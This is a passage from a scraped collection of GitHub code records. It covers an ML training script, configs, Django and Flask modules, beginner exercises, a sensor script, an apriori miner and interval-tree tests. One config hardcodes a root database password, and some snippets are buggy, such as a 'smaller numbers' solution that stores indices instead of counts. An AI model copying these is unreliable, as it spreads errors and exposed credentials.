sembm.core.base_trainer import BaseTrainer\nfrom 
sembm.core.config import cfg, cfg_from_file, cfg_from_list\nfrom sembm.utils.timer import Timer\nfrom sembm.apis.eval import evaluate\n\n\nclass DecTrainer(BaseTrainer):\n\n def __init__(self, args, **kwargs):\n super(DecTrainer, self).__init__(args, **kwargs)\n\n # dataloader\n self.trainloader = get_dataloader(\n cfg.DATASET.NAME,\n cfg,\n 'train',\n batch_size=cfg.TRAIN.BATCH_SIZE,\n num_workers=cfg.TRAIN.NUM_WORKERS,\n test_mode=False)\n self.valloader = get_dataloader(\n cfg.DATASET.NAME, cfg, 'val', batch_size=1, num_workers=cfg.TRAIN.NUM_WORKERS, test_mode=True)\n\n self.nclass = get_num_classes(cfg.DATASET.NAME)\n self.classNames = get_class_names(cfg.DATASET.NAME)\n assert self.nclass == len(self.classNames)\n\n # model\n self.enc = build_model(cfg).cuda()\n\n # optimizer using different LR\n enc_params = self.enc.parameter_groups(cfg.NET.LR, cfg.NET.WEIGHT_DECAY)\n self.optim_enc = self.get_optim(enc_params, cfg.NET)\n\n # checkpoint management\n self._define_checkpoint('enc', self.enc, self.optim_enc)\n self._load_checkpoint(args.resume)\n\n # using cuda\n self.enc = nn.DataParallel(self.enc)\n\n self._iter = 0\n\n def train_step(self, epoch, batched_inputs):\n\n PRETRAIN = epoch < cfg.TRAIN.PRETRAIN\n\n for k in ['img', 'pix_gt', 'img_gt', 'raw_img']:\n if isinstance(batched_inputs[k], torch.Tensor):\n batched_inputs[k] = batched_inputs[k].cuda()\n batched_inputs['PRETRAIN'] = PRETRAIN\n # classification\n output = self.enc(batched_inputs)\n losses = {k: v.mean() for k, v in output.items() if k.startswith('loss')}\n loss = sum(losses.values())\n\n if self.enc.training:\n self.optim_enc.zero_grad()\n loss.backward()\n self.optim_enc.step()\n\n self._iter += 1\n\n losses[\"loss\"] = loss\n losses = {k: v.item() for k, v in losses.items() if k.startswith('loss')}\n\n # make sure to cut the return values from graph\n return losses\n\n def train_epoch(self, epoch):\n self.enc.train()\n\n # adding stats for classes\n timer = Timer(\"New Epoch: \")\n for i, dataset_dict in enumerate(self.trainloader):\n losses = self.train_step(epoch, dataset_dict)\n\n # intermediate logging\n if i % 10 == 0:\n msg = \"Loss [{:04d}]: \".format(i)\n for loss_key, loss_val in losses.items():\n msg += \"{}: {:.4f} | \".format(loss_key, loss_val)\n\n msg += \" | Im/Sec: {:.1f}\".format(i * self.trainloader.batch_size / timer.get_stage_elapsed())\n self.logger.info(msg)\n sys.stdout.flush()\n\n # plotting learning rate\n for ii, l in enumerate(self.optim_enc.param_groups):\n self.logger.info(\"Learning rate [{}]: {:4.3e}\".format(ii, l['lr']))\n self.writer.add_scalar('lr/enc_group_%02d' % ii, l['lr'], epoch)\n\n def validation(self, epoch, checkpoint=False):\n self.enc.eval()\n with torch.no_grad():\n IoU = evaluate(self.enc, self.valloader, False)\n mIoU = np.mean(IoU)\n\n self.logger.info(f'IoU: {IoU}')\n self.logger.info(f'mIoU: {mIoU}')\n\n if checkpoint:\n self.checkpoint_best(mIoU, epoch)\n\n self.writer.add_scalar('val_mIoU', mIoU, epoch)\n for idx, class_name in enumerate(self.classNames):\n self.writer.add_scalar(f'val_IoU/{idx:02d}_{class_name}', IoU[idx], epoch)\n\n\nif __name__ == \"__main__\":\n args = get_arguments(sys.argv[1:])\n\n # Reading the config\n cfg_from_file(args.cfg_file)\n if args.set_cfgs is not None:\n cfg_from_list(args.set_cfgs)\n\n trainer = DecTrainer(args)\n\n trainer.logger.info(\"Config: \\n\")\n trainer.logger.info(cfg)\n\n timer = Timer()\n\n def time_call(func, msg, *args, **kwargs):\n timer.reset_stage()\n func(*args, **kwargs)\n trainer.logger.info(msg + (\" 
{:3.2}m\".format(timer.get_stage_elapsed() / 60.)))\n\n for epoch in range(trainer.start_epoch, cfg.TRAIN.NUM_EPOCHS + 1):\n trainer.logger.info(\"Epoch >>> {}\".format(epoch))\n\n time_call(trainer.train_epoch, \"Train epoch: \", epoch)\n\n if epoch != 0:\n with torch.no_grad():\n time_call(trainer.validation, \"Validation / Val: \", epoch, checkpoint=True)\n","repo_name":"sennnnn/semseg_benchmark","sub_path":"tools/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19769604932","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author: Dang Kai\n# @Date: 2018-08-06 17:25:43\n# @Last Modified time: 2019-04-30 15:21:11\n# @E-mail: 1370465454@qq.com\n# @Description:定义一些默认参数、路径等\nimport os\nimport time\nnow = time.strftime('%Y-%m-%d_%H_%M_%S')\n# 项目参数设置\nprj_path = os.path.dirname(os.path.dirname(__file__))\n# ��志路径\nlog_path = os.path.join(prj_path, 'report', 'Log')\n\n# 测试报告路径\nreport_path = os.path.join(prj_path, 'report', 'test_report')\n\n# 测试excel结果路径\nresult_path = os.path.join(\n prj_path, 'report', 'test_result\\\\' + now + 'report.xlsx')\n# 默认浏览器\nbrowser = 'Chrome'\n# 浏览器\nurl = 'https://zhytest.999.com.cn/'\n# 测试数据路径\ndata_path = os.path.join(prj_path, 'data', 'test_data')\n# 读取Excel数据\ndata_path_name = os.path.join(prj_path, 'data', \"TestCase.xlsx\")\n# 读取表名\nread_excel_sheetname = \"TestCase\"\n\n# mysql数据库的连接信息\ndb_config = {\n 'host': 'localhost',\n 'port': 3306,\n 'user': 'root',\n 'password': '137046',\n 'database': 'study'\n}\n","repo_name":"DangKaio/python-unittest-requests","sub_path":"config/globalparam.py","file_name":"globalparam.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"34737550416","text":"from django.contrib import admin\nfrom import_export.admin import ImportExportModelAdmin\nfrom .models import Cidade\nfrom .models import Empresa\nfrom .models import Endereco\nfrom .models import Estado\nfrom .models import Pais\n\n\nclass EnderecoInline(admin.StackedInline):\n model = Endereco\n fields = [\n 'cep',\n 'logradouro',\n 'complemento',\n 'numero',\n 'bairro',\n 'pais',\n 'estado',\n 'cidade',\n ]\n exclude = ['data_criacao']\n list_select_related = (\n 'pais',\n 'estado',\n 'cidade',\n )\n\n\n@admin.register(Empresa)\nclass EmpresaAdmin(admin.ModelAdmin):\n list_display = ['id', 'nome', 'cpf_cnpj']\n exclude = ['user', 'data_criacao']\n inlines = (EnderecoInline,)\n\n fieldsets = (\n ('Dados Principais', {'fields': (\n 'foto',\n 'nome',\n 'is_empresa',\n 'cpf_cnpj',\n 'rg'\n )}),\n ('Contato', {'fields': (\n 'telefone',\n 'celular',\n 'email'\n )}),\n ('Detalhes e Configurações', {'fields': (\n 'slogan',\n )}),\n )\n\n\n@admin.register(Cidade)\nclass CidadeAdmin(ImportExportModelAdmin):\n list_display = ['id', 'nome', 'estado', 'pais']\n list_filter = ['estado', 'estado__pais']\n readonly_fields = ['data_criacao']\n\n\n@admin.register(Estado)\nclass EstadoAdmin(ImportExportModelAdmin):\n list_display = ['id', 'nome', 'codigo']\n list_filter = ['pais']\n readonly_fields = ['data_criacao']\n\n\n@admin.register(Pais)\nclass PaisAdmin(admin.ModelAdmin):\n list_display = ['id', 'nome']\n readonly_fields = 
['data_criacao']\n","repo_name":"TimeNovaData/infcam","sub_path":"core/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14683256035","text":"from flask import render_template, request, flash, url_for, redirect\nfrom . import subscription_bp\nfrom ..models import Event, Subscriber\nfrom ..forms import SubscriptionForm\nfrom ..manager import MAX_USER_IN_EVENT\n\n\n@subscription_bp.route('/', methods=['GET', 'POST'])\ndef subscription(event_link):\n # verifica se o id do inscrito atual pertence ao usuario logado\n event = Event.query.filter_by(link=event_link).first()\n data = {'link_full': request.host_url + event_link}\n if event:\n form = SubscriptionForm()\n if request.method == 'GET':\n #verifica se o maximo de usuarios já foi atingido\n if len(event.subscriber) >= MAX_USER_IN_EVENT:\n flash('O evento já está lotado!', 'danger')\n\n elif request.method == 'POST':\n if len(event.subscriber) >= MAX_USER_IN_EVENT:\n flash('O evento já está lotado! Você não pode se inscrever!', 'danger')\n return redirect(url_for('subscription.subscription', event_link=event_link))\n\n elif form.validate_on_submit():\n sub = Subscriber()\n sub.name = form.name.data\n sub.user_id = event.user_id\n\n # verifica se o message já foi cadastrado para o usuario atual!\n if Subscriber.query.filter_by(email=form.email.data, user_id=event.user_id).first():\n flash(f'Falha no cadastro! O email já está em uso!', 'danger')\n return redirect(url_for('subscription.subscription', event_link=event_link))\n\n sub.email = form.email.data\n sub.event.append(event)\n try:\n sub.save()\n except Exception as e:\n print('Erro no bd: ', e)\n flash('Houve uma falha interna, contate o ADM', 'warning')\n else:\n flash('Inscrição realizada com sucesso!', 'success')\n\n\n return render_template('subscription.html', event=event, form=form, data=data)\n\n else:\n return render_template('404.html')\n\n","repo_name":"andersonssh/gerenciador-de-eventos","sub_path":"event_manager/subscription/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"22456694244","text":"'''\n11. Using a for loop, create the list below, which consists of ones separated by increasingly many\nzeroes. 
The last two ones in the list should be separated by ten zeroes.\n[1,1,0,1,0,0,1,0,0,0,1,0,0,0,0,1,....]\n'''\n\nlist = [1]\nprint(list)\n\nfor i in range (11):\n if i == 0:\n list.append(1)\n else:\n for j in range (i):\n list.append(0)\n list.append(1)\nprint(list)\n","repo_name":"ralucadragan/A-Practical-Introduction-to-Python-Programming","sub_path":"Jau7_Lists/ex11.py","file_name":"ex11.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26623617338","text":"# AGE CALCULATOR PROJECT\n\n\nimport datetime\nfrom datetime import datetime\nimport sys\nmonthsWithDaysTest = {\n 1: 31,\n 2: 29,\n 3: 31,\n 4: 30,\n 5: 31,\n 6: 30,\n 7: 31,\n 8: 31,\n 9: 30,\n 10: 31,\n 11: 30,\n 12: 31\n}\n\nprint('')\nprint('\\n ******** AGE CALCULAOTR ********\\n')\nprint('You are going to enter your date of birth in order....')\nprint('')\n\nwhile True:\n try:\n birthYear = int(input('enter your birth-year(YYYY)?....'))\n birthMonth = int(input('enter your birth-month(MM)?....'))\n birthDay = int(input('enter your birth-day(DD)?....'))\n\n if (birthYear == '' or birthMonth == \"\" or birthDay == ''):\n print('Invalid Input..read instructions and try again....')\n print('')\n continue\n elif birthMonth > 12 or birthDay > 31:\n print('Invalid Input..read instructions and try again....')\n print('')\n continue\n else:\n ageInyears = datetime.now().year - birthYear\n ageInMonth = datetime.now().month - birthMonth\n ageInDays = datetime.now().day - birthDay\n\n\n # cases where teh birthday hanst appeared yet\n if (datetime.now().month < birthMonth or (datetime.now().month == birthMonth and datetime.now().day < birthDay)):\n ageInyears -=1\n ageInMonth += 12\n\n if datetime.now().day < birthDay:\n ageInMonth -= 1\n lastmonth = monthsWithDaysTest[(datetime.now().month + 11) % 12]\n ageInDays += lastmonth\n\n if ageInDays == 1:\n word = 'day'\n else:\n word = 'days'\n\n print(f\"you are {ageInyears} years , {ageInMonth} months and {ageInDays} {word}\")\n\n user_option = input('do you want to try again(Y for YES | N for NO)...').lower()\n if user_option == 'y':\n continue\n elif user_option == 'n':\n print('See ya.....')\n sys.exit(0)\n else:\n print('invalid Option....EXIITNG')\n sys.exit(0)\n except Exception as e:\n print(f'Invalid Input.....Error : {e}')\n\n\n\n\n\n\n","repo_name":"Felix221123/python_projects","sub_path":"age-calculator.py","file_name":"age-calculator.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4617754810","text":"import openmoc\n\n\ndef py_printf(level, my_str, *args):\n \"\"\"Print a log message to the screen and the log file.\n\n This method is a wrapper to the log_printf C++ routine. 
It allows for\n formatted messages to be printed to the screen in a similar fashion to the\n C/C++ printf method, but with additional formatting provided by the OpenMOC\n logging utilities.\n\n Parameters\n ----------\n level : str\n The logging level for this message (i.e., 'NORMAL')\n my_str : str\n The string to print to the screen\n *args : list\n A variable length list of values for the message string\n\n Examples\n --------\n An example of how this may be used in a OpenMOC Python script is as follows:\n\n >>> value1 = 25\n >>> value2 = 26.0\n >>> log.py_printf('NORMAL', 'My name is Will and I am %d going on ' \\\n '%f years of age', value1, value2)\n\n \"\"\"\n\n if level == 'DEBUG':\n openmoc.log_printf(openmoc.DEBUG, my_str % args)\n elif level == 'INFO':\n openmoc.log_printf(openmoc.INFO, my_str % args)\n elif level == 'NORMAL':\n openmoc.log_printf(openmoc.NORMAL, my_str % args)\n elif level == 'SEPARATOR':\n openmoc.log_printf(openmoc.SEPARATOR, my_str % args)\n elif level == 'HEADER':\n openmoc.log_printf(openmoc.HEADER, my_str % args)\n elif level == 'TITLE':\n openmoc.log_printf(openmoc.TITLE, my_str % args)\n elif level == 'WARNING':\n openmoc.log_printf(openmoc.WARNING, my_str % args)\n elif level == 'CRITICAL':\n openmoc.log_printf(openmoc.CRITICAL, my_str % args)\n elif level == 'RESULT':\n openmoc.log_printf(openmoc.RESULT, my_str % args)\n elif level == 'ERROR':\n openmoc.log_printf(openmoc.ERROR, my_str % args)\n else:\n openmoc.log_printf(openmoc.ERROR, \"Unknown message log level.\")\n\n\ndef set_log_level(level):\n \"\"\"Assign the lowest level logging message to be reported.\n\n Sets the lowest level logging message to print to the screen. This controls\n the lowest level for both logging messages in the C++ source code as well as\n the user's OpenMOC Python input file.\n\n Parameters\n ----------\n level : str\n The minimum logging level (i.e., 'DEBUG', 'INFO')\n\n Examples\n --------\n This routine may be called in an OpenMOC Python script as follows:\n\n >>> log.set_log_level('INFO')\n\n \"\"\"\n\n if level == 'DEBUG':\n openmoc.set_log_level('DEBUG')\n elif level == 'INFO':\n openmoc.set_log_level('INFO')\n elif level == 'NORMAL':\n openmoc.set_log_level('NORMAL')\n elif level == 'SEPARATOR':\n openmoc.set_log_level('SEPARATOR')\n elif level == 'HEADER':\n openmoc.set_log_level('HEADER')\n elif level == 'TITLE':\n openmoc.set_log_level('TITLE')\n elif level == 'WARNING':\n openmoc.set_log_level('WARNING')\n elif level == 'CRITICAL':\n openmoc.set_log_level('CRITICAL')\n elif level == 'RESULT':\n openmoc.set_log_level('RESULT')\n elif level == 'ERROR':\n openmoc.set_log_level('ERROR')\n else:\n py_printf('Cannot set log level to unsupported level %s', str(level))\n","repo_name":"mit-crpg/OpenMOC","sub_path":"openmoc/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","stars":135,"dataset":"github-code","pt":"53"} +{"seq_id":"3942021427","text":"class Solution(object):\n def smallerNumbersThanCurrent(self, nums):\n smallers = [0]* len(nums)\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n for i in range(len(nums)):\n for j in range(len(nums)):\n if( j!= i and nums[j] < nums[i]):\n smallers[i] =j \n return smallers\n \n","repo_name":"Beki4382/Competitive-Programming","sub_path":"smallerThanTheCurrent.py","file_name":"smallerThanTheCurrent.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"73043396969","text":"# read analogue temp sensor on Pico\n# conversion for LMT86LPG\n# http://www.ti.com/lit/ds/symlink/lmt86.pdf\n# sensor is +- 0.4 to 0.7C so can round to one decimal place\n# Kirk Martinez and Denise Yap 2018\nimport math\nfrom time import sleep\nfrom pyb import Pin\nfrom pyb import RTC\n\na = pyb.ADC(pyb.Pin.board.A5)\ng = pyb.Pin('A7', pyb.Pin.OUT_PP)\nrtc = RTC()\n\n# set a specific date and time\nrtc.datetime((2019, 7, 27, 5, 15, 42, 0, 0)) \n\n#Tuen on lmt86\nprint('LMT86 turn on.')\ng.high()\n#must wait 2ms before use\nsleep(0.02)\n#Check ADC value \ndef adcValue():\t\n\tadcVal = a.read()\n\treturn adcVal\n\n#Convert ADC value to mV\n#def mV():\n\t# convert adc to mV using 3300mV as Vcc\n\t#tmp = a.read()\n\t#v = tmp * 3300 / 4096.0\t\n\t#tc = ((10.888 - math.sqrt(118.548544 + 0.01388 * (1777.3 -v)))/-0.00694) + 30\t\t\t\n\t#return v\n\t#return(round(tc,1))\n\n#Convert adc to degree celcius\ndef lmt86():\n\tmv = a.read() * 3300.0 / 4096.0\n\ttc2 = ((10.888 - math.sqrt(118.548544 + 0.01388 * (1777.3 - mv)))/-0.00694) + 30\n\tif tc2 > 40:\n\t\ttc2 = 40\n\telif tc2 < -40:\n\t\ttc2 = -40\n\treturn tc2\n\t#return(round(tc2,1))\n\n#Use mean to minimize white noise\t\ndef meantemp():\n\tn = 0.0\n\tfor count in range(1,10):\n\t\tn = n + lmt86()\n\treturn(round(n/10.0,1))\n\ndef rtcc():\n\tr = rtc.datetime() # get date and time\n\treturn r\n\n#while True:\n\t#print(lmt86())\n\t#sleep(1)\t\n\n#Print meantemp for 100 times\t\nfor count in range(1,100):\n\t#print('Date and Time : ')\n\t#print(rtcc())\n\tprint('meantemp : ')\n\tprint(meantemp())\n\tsleep(2)\n\n#Turn off lmt86\nprint('lmt86 turn off.')\ng.low()\t\n","repo_name":"kmartinez/picogps","sub_path":"testfiles/test-temp.py","file_name":"test-temp.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"356926725","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\n\r\n\r\n\r\n\r\ndef f1_comparison(f1_scores,method_list):\r\n # Creating a F1 comparison chart\r\n f1_score = pd.Series(f1_scores, index=method_list).sort_values(ascending=False)\r\n sns.barplot(x = f1_score, y = f1_score.index)\r\n print('f1_score')\r\n plt.xlabel('F1 Score')\r\n plt.ylabel('Methods')\r\n plt.title(\"Comparing F1 Scores\")\r\n plt.legend()\r\n plt.show()\r\n\r\n\r\ndef recall_comparison(recall_scores,method_list):\r\n # Creating a recall comparison chart\r\n recall_score = pd.Series(recall_scores, index=method_list).sort_values(ascending=False)\r\n sns.barplot(x = recall_score, y = recall_score.index)\r\n print('recall_score')\r\n plt.xlabel('Recall Score')\r\n plt.ylabel('Methods')\r\n plt.title(\"Comparing Recall Scores\")\r\n plt.legend()\r\n plt.show()\r\n\r\n\r\ndef accuracy_comparison(accuracy_scores,method_list):\r\n # Creating an accuracy comparison chart\r\n accuracy_score = pd.Series(accuracy_scores, index=method_list).sort_values(ascending=False)\r\n sns.barplot(x = accuracy_score, y = accuracy_score.index)\r\n print('accuracy_score')\r\n plt.xlabel('Accuracy Score')\r\n plt.ylabel('Methods')\r\n plt.title(\"Comparing Accuracy Scores\")\r\n plt.legend()\r\n plt.show()\r\n\r\ndef create_scores():\r\n # getting the scores from the results files\r\n method_list = ['K-means','Spectral Clustering','GMM','Random Forest','MLP','Neural Network',\r\n 'Random Forest with Importance','GMM with PCA','MLP with PCA','NN with PCA']\r\n f1_scores = []\r\n recall_scores = []\r\n accuracy_scores = 
[]\r\n\r\n df1 = pd.read_csv('results_folder/k_means_result.csv', names=range(3))\r\n df1 = df1.values\r\n f1_scores.append(df1[0, 0])\r\n recall_scores.append(df1[0, 1])\r\n accuracy_scores.append(df1[0, 2])\r\n\r\n df1 = pd.read_csv('results_folder/spectral_result.csv', names=range(3))\r\n df1 = df1.values\r\n f1_scores.append(df1[0, 0])\r\n recall_scores.append(df1[0, 1])\r\n accuracy_scores.append(df1[0, 2])\r\n\r\n df1 = pd.read_csv('results_folder/gmm_result.csv', names=range(3))\r\n df1 = df1.values\r\n f1_scores.append(df1[0, 0])\r\n recall_scores.append(df1[0, 1])\r\n accuracy_scores.append(df1[0, 2])\r\n\r\n df1 = pd.read_csv('results_folder/forest_result.csv', names=range(3))\r\n df1 = df1.values\r\n f1_scores.append(df1[0, 0])\r\n recall_scores.append(df1[0, 1])\r\n accuracy_scores.append(df1[0, 2])\r\n\r\n df1 = pd.read_csv('results_folder/mlp_result.csv', names=range(3))\r\n df1 = df1.values\r\n f1_scores.append(df1[0, 0])\r\n recall_scores.append(df1[0, 1])\r\n accuracy_scores.append(df1[0, 2])\r\n\r\n df1 = pd.read_csv('results_folder/nn_result.csv', names=range(3))\r\n df1 = df1.values\r\n f1_scores.append(df1[0, 0])\r\n recall_scores.append(df1[0, 1])\r\n accuracy_scores.append(df1[0, 2])\r\n\r\n df1 = pd.read_csv('results_folder/forest_fi_result.csv', names=range(3))\r\n df1 = df1.values\r\n f1_scores.append(df1[0, 0])\r\n recall_scores.append(df1[0, 1])\r\n accuracy_scores.append(df1[0, 2])\r\n\r\n df1 = pd.read_csv('results_folder/cluster_result.csv', names=range(3))\r\n df1 = df1.values\r\n f1_scores.append(df1[0,0])\r\n recall_scores.append(df1[0,1])\r\n accuracy_scores.append(df1[0,2])\r\n\r\n df2 = pd.read_csv('results_folder/mlp_pca_result.csv', names=range(3))\r\n df2 = df2.values\r\n f1_scores.append(df2[0,0])\r\n recall_scores.append(df2[0,1])\r\n accuracy_scores.append(df2[0,2])\r\n\r\n df3 = pd.read_csv('results_folder/nn_pca_result.csv', names=range(3))\r\n df3 = df3.values\r\n f1_scores.append(df3[0,0])\r\n recall_scores.append(df3[0,1])\r\n accuracy_scores.append(df3[0,2])\r\n return method_list, f1_scores, recall_scores, accuracy_scores\r\n\r\n\r\ndef main():\r\n method_list, f1_scores, recall_scores, accuracy_scores = create_scores()\r\n f1_comparison(f1_scores,method_list)\r\n recall_comparison(recall_scores, method_list)\r\n accuracy_comparison(accuracy_scores, method_list)\r\n\r\n\r\n","repo_name":"Meydand2001/Machine-Learning-project","sub_path":"Comparison.py","file_name":"Comparison.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9869503719","text":"#!/usr/bin/env python3\n# pip install pillow to get the PIL module\n\nimport sys\nfrom PIL import Image, ImageChops\nimport numpy as np\nimport os\n\n\nscreen_width = 128\nscreen_height = 64\n\n\ndef main(fn, id, threshold, file=None, ext=\".jpg\"):\n if file:\n f = open(os.path.join('../include/data_img', file + \".h\"), \"w\")\n printto = f\n # and also save thumbnail of jpg\n else:\n printto = sys.stdout\n image = Image.open(os.path.join('img', fn + ext))\n image = rotate_image(image)\n image = resize_image(image, 200, 200)\n image = threshold_image(image, threshold)\n image = trim_image(image)\n image = resize_image(image, screen_width, screen_height)\n print(image.size, end='\\t')\n\n print(\"\\n\"\n \"#define {id}_width {w}\\n\"\n \"#define {id}_height {h}\\n\"\n \"\\n\"\n \"const uint8_t PROGMEM {id}_data[] = {{\\n\"\n .format(id=id, w=image.width, h=image.height), end='', file=printto)\n 
for y in range(0, image.height):\n for x in range(0, (image.width + 7) // 8 * 8):\n if x == 0:\n print(\" \", end='', file=printto)\n if x % 8 == 0:\n print(\"B\", end='', file=printto)\n\n bit = '1'\n if x < image.width and image.getpixel((x, y)) != 0:\n bit = '0'\n print(bit, end='', file=printto)\n\n if x % 8 == 7:\n print(\",\", end='', file=printto)\n print(file=printto)\n print(\"};\", file=printto)\n if file:\n f.close()\n image.save(os.path.join('img_out', file + \".jpg\"), \"JPEG\")\n\n\ndef resize_image(image, w, h):\n image.thumbnail((w, h), Image.ANTIALIAS)\n # image.thumbnail((screen_height, screen_width), Image.NEAREST)\n return image\n\n\ndef threshold_image(image, threshold):\n image = image.convert('L') # create grayscale\n # image = image.convert('1') # create binary image\n\n def fnth(x):\n return 255 if x > threshold else 0\n image = image.point(fnth, mode='1')\n return image\n\n\ndef rotate_image(image):\n w, h = image.size\n if h > w:\n image = image.rotate(90, expand=True)\n return image\n\n\ndef trim_image(im):\n bg = Image.new(im.mode, im.size, im.getpixel((0, 0)))\n diff = ImageChops.difference(im, bg)\n diff = ImageChops.add(diff, diff, 2.0, -100)\n bbox = diff.getbbox()\n if bbox:\n print('trimming!', end='\\t')\n return im.crop(bbox)\n else:\n return im\n\n\ndef show_image(image):\n image.show()\n\n\nif __name__ == '__main__':\n\n # get all files in dir\n onlyfiles = [f for f in os.listdir('img') if os.path.isfile(os.path.join('img', f))]\n for fn in onlyfiles:\n temp = os.path.splitext(fn)\n fn = temp[0]\n ext = temp[1]\n print(\"Saving {fname}\".format(fname=fn), end='\\t')\n main(fn, fn, 150, file=fn, ext=ext)\n print()\n\n # main(fn, id, 150, file=id)\n","repo_name":"rick3rt/ESP8266exOLED","sub_path":"script/make_splash_folder.py","file_name":"make_splash_folder.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33229902151","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Feb 15 22:11:45 2019\r\n\r\n@author: Nikhil Vishwanath, \r\n M.Sc. 
Data Science, \r\n Chennai Mathematical Institute\r\n\"\"\"\r\nprint(\"Give input in following format\")\r\nprint(\"k_itemset(k, frequency, vocab file address, docword file address)\")\r\n\r\ndef k_itemset(k, f, vocab, words):\r\n import time\r\n import pandas as pd\r\n \r\n #to start the timer \r\n start = time.time()\r\n \r\n #reading the vocab file \r\n r = pd.read_csv(vocab,sep = \" \",header = None) \r\n r = pd.DataFrame(r)\r\n #increasing the index by one so that index is same as wordID \r\n #which will save storage space \r\n \r\n r.index = range(1,len(r)+1)\r\n \r\n #reading docword file \r\n doc = pd.read_csv(words)\r\n \r\n \r\n df =doc.loc[2:,:] \r\n \r\n #reanming column, because while reading the file it read first entry as column name\r\n df = df.rename(columns = {df.columns[0]:\"A\"})\r\n \r\n #since the file was read as one column dataset, all the lines from 2 onwards have\r\n #three space seperated integers respectively docID, wordID, count \r\n #the line below will make three columns in dataframe \r\n #split each row into three parts and then store values in respective columns\r\n \r\n doc = pd.DataFrame(df.A.str.split(\" \",2).tolist(),columns = [\"docID\",\"wordID\",\"count\"])\r\n doc = pd.DataFrame(doc)\r\n \r\n #then compiling all the words that occur in given document into a single tuple \r\n #and storing the values as list of tuples where each tuple consist of all the words in \r\n #respective document. These tuples are our transactions.\r\n \r\n \r\n \r\n #This for lop was not efficient so I had to drop it\r\n '''\r\n for i in doc[\"docID\"].unique():\r\n d.append(tuple(set( [doc[\"wordID\"][j] for j in doc[doc[\"docID\"]==i].index])))\r\n '''\r\n \r\n #Storing in list of tuples\r\n\r\n d = doc.groupby(\"docID\")[\"wordID\"].apply(tuple)\r\n \r\n \r\n #importing the package efficient_apriory and running apriori algorithm on our transactions\r\n from efficient_apriori import itemsets_from_transactions as item\r\n #item function takes three inputs (list of transactions , min support or frequency, max k frequent itemset)\r\n itemsets = item(d, f, k+1)\r\n \r\n #Earlier I had mapped wordIDs to words while making list of transactions but it was\r\n #very costly in terms of compution and memory, therefore I changed the code such that \r\n #each transaction contains wordIDs and when we get the answer I mapped wordIds to corresponding words\r\n \r\n \r\n \r\n # calculating the end time \r\n end = time.time()\r\n \r\n #if k-itemset is not present for the given freq, it will terminate \r\n \r\n if len(itemsets[0]) offset]\n if after:\n after = after[0]\n else:\n after = None\n offsets[offset] = (before, after)\n return offsets\n\n\ndef make_moment_fixtures(range_=10, intervals=None):\n if not intervals:\n intervals = make_intervals()\n fixtures = {}\n for offset in range(range_):\n overlaps, starts, stops = [], [], []\n for interval in intervals:\n if interval.start_offset == offset:\n starts.append(interval)\n elif interval.stop_offset == offset:\n stops.append(interval)\n elif interval.start_offset < offset < interval.stop_offset:\n overlaps.append(interval)\n overlaps.sort()\n starts.sort()\n stops.sort()\n fixtures[offset] = (overlaps, starts, stops)\n return fixtures\n\n\ndef make_intervals():\n return [\n Interval(start_offset=0, stop_offset=3),\n Interval(start_offset=1, stop_offset=3),\n Interval(start_offset=1, stop_offset=2),\n Interval(start_offset=2, stop_offset=5),\n Interval(start_offset=6, stop_offset=9),\n ]\n\n\ndef make_interval_tree(accelerated, 
populated=True, intervals=None):\n if populated and not intervals:\n intervals = make_intervals()\n interval_tree = IntervalTree(intervals=intervals, accelerated=accelerated)\n if accelerated:\n assert isinstance(interval_tree._driver, IntervalTreeDriverEx)\n else:\n assert isinstance(interval_tree._driver, IntervalTreeDriver)\n return interval_tree\n\n\ndef make_random_intervals(count=10, range_=10):\n indices = list(range(range_))\n intervals = []\n for _ in range(count):\n random.shuffle(indices)\n start_offset, stop_offset = sorted(indices[:2])\n interval = Interval(start_offset=start_offset, stop_offset=stop_offset)\n intervals.append(interval)\n return intervals\n\n\ndef make_target_intervals(range_=10):\n indices = list(range(range_))\n intervals = []\n for pair in itertools.permutations(indices, 2):\n start_offset, stop_offset = sorted(pair)\n target_interval = Interval(start_offset=start_offset, stop_offset=stop_offset)\n intervals.append(target_interval)\n return intervals\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test___contains__(accelerated):\n intervals = make_intervals()\n interval_tree = make_interval_tree(accelerated=accelerated, populated=True)\n assert intervals[0] in interval_tree\n assert Interval(-1, 100) not in interval_tree\n interval_tree.remove(intervals[-1])\n assert intervals[-1] not in interval_tree\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test___getitem__(accelerated):\n interval_tree = make_interval_tree(accelerated=accelerated, populated=True)\n assert interval_tree[-1] == Interval(6, 9)\n assert [interval for interval in interval_tree[:3]] == [\n Interval(start_offset=0, stop_offset=3),\n Interval(start_offset=1, stop_offset=2),\n Interval(start_offset=1, 